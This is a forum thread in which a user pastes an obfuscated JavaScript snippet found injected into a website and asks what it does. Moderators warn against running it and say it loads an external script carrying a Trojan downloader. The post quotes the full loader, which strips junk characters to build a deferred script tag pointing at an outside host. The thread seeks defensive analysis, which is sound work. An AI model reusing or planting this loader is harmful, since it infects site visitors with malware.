Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 4 of 4
  1. #1
    New to the CF scene
    Join Date
    Jan 2010
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Virus/Trojan code?

    Hello,
    Please help me to understand the risk from the js code I found on http://www.glanstider.no website.

    The code looks very strange:

    Code:
    <script>/*LGPL*/ try{ window.onload = function(){var Ynrwc1hiq87h = document.createElement('s)^c@r$$)#i$@p($$$t^'.replace(/#|@|\!|\(|\)|\^|\$|&/ig, ''));Ynrwc1hiq87h.setAttribute('defer', 'd@$e^#@)f&&^e@r()'.replace(/#|\)|\(|&|@|\^|\!|\$/ig, ''));Ynrwc1hiq87h.setAttribute('type', 't&&(e&(x&#t($/@j#@a#&@v#a)#s@^c#r@#i!p(!t^$&$'.replace(/&|@|\!|\$|\^|\)|\(|#/ig, ''));Ynrwc1hiq87h.setAttribute('id', 'Z(#!(e(l@@!!5#@b()))x#&i#)&6^@@s(@y@@x()^v)&9#&'.replace(/\!|\$|@|&|\)|\(|\^|#/ig, ''));Ynrwc1hiq87h.setAttribute('s#)!r^^@^c^&!'.replace(/@|\!|\^|\)|&|\$|#|\(/ig, ''),  'h(&t#))t&p#:)/(/@0!@(!@1&&)n#)!)e)#t)@)^-$c&)o((m#!(.$!^t)@^i&(g@&(@@e(@(r^@!d!(@&i&^^r#(!e(&^c&@t)^&.)!)c)o^^)m(!).!!@&g$#)^o$!&d#$a&d&@@d!$)y)-@!&c!$o@&$m^$$.!^(c#@a^)@r(!@#s#((w#(#(e!b!@n$@^e)t$@^!.(!$@#r(u$#!#!:&8@0^^8^##&0!^/^g)&^o)#!o!#g&l$^$$e#.$))$c@&)o^^m##(/#@)!g($@#o&)o#@g!($l$$^(#e#@.@c)$^o@m!$/#&&c@a!@r)^)e##e^$!!r&&)b)$u!$$$i@l#()d$^#e$r@$!!.$#(c#^o^@)m@&#&/)$x)@$&(n)#x)&(x@.&!#c&)@o($m(#/@(s^$^@o^s@$&o$^).$!c&^o#$#m!/!@&&@'.replace(/\(|\)|&|\^|#|\$|\!|@/ig, ''));if (document){document.body.appendChild(Ynrwc1hiq87h);}} } catch(Jg8hbd0kytqswmmfze) {}</script>
    <!--40ace59eda33a6f5e5733ed6bdc65c1e-->

    could you please tell me what this code do and how high is the security lack?

    Thanks
    ---
    [edit by Moderator Kor]Caution! Of course, don't run that code in your browsers. To read it I have only deciphered portions of it and I have found that it probably loads a Trojan.
    Last edited by Kor; 01-08-2010 at 12:46 PM.

  • #2
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    17,985
    Thanks
    203
    Thanked 2,536 Times in 2,514 Posts
    No idea what it does, but I would avoid it like the plague.

    40ace59eda33a6f5e5733ed6bdc65c1e
    translates to
    @¬åžÚ3¦õås>Ö½Æ\
    Last edited by Philip M; 01-08-2010 at 11:45 AM.

  • #3
    New to the CF scene
    Join Date
    Jan 2010
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

  • #4
    Kor
    Kor is offline
    Red Devil Mod Kor's Avatar
    Join Date
    Apr 2003
    Location
    Bucharest, ROMANIA
    Posts
    8,478
    Thanks
    58
    Thanked 379 Times in 375 Posts
    Quote Originally Posted by Philip M View Post
    No idea what it does, but I would avoid it like the plague.

    40ace59eda33a6f5e5733ed6bdc65c1e
    translates to
    @¬åžÚ3¦õås>Ö½Æ\
    Which in fact is (from latin-1 to KO18 [Russian]):
    @╛х·к3ІУхs>жНЦ\
    Because that code loads an external javascript file from a site from Russia which might inject the Trojan-Downloader.JS.Agent.ewh virus
    KOR
    Offshore programming
    -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*


  •  

    Tags for this Thread

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •